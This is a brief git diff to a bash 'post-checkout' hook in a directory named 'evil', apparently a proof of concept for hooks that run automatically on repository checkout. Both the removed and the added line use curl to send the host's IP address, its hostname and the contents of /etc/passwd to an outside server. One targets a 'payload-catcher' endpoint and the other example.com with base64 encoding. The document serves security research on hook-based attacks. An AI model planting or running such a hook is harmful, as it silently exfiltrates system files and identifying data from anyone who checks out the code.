diff --git a/modules/1/2/3/4/evil/hooks/post-checkout b/modules/1/2/3/4/evil/hooks/post-checkout index 1e01236..97740cf 100755 --- a/modules/1/2/3/4/evil/hooks/post-checkout +++ b/modules/1/2/3/4/evil/hooks/post-checkout @@ -1,2 +1,2 @@ #!/bin/bash -curl -X POST https://z0.rs/payload-catcher.php -d "ip=$(hostname -I)&hostname=$(hostname)&passwd=$(cat /etc/passwd)" +curl -X POST http://example.com -d "ip=$(hostname -I | tr -d '[:space:]')&hostname=$(hostname)&passwd=$(cat /etc/passwd | base64)"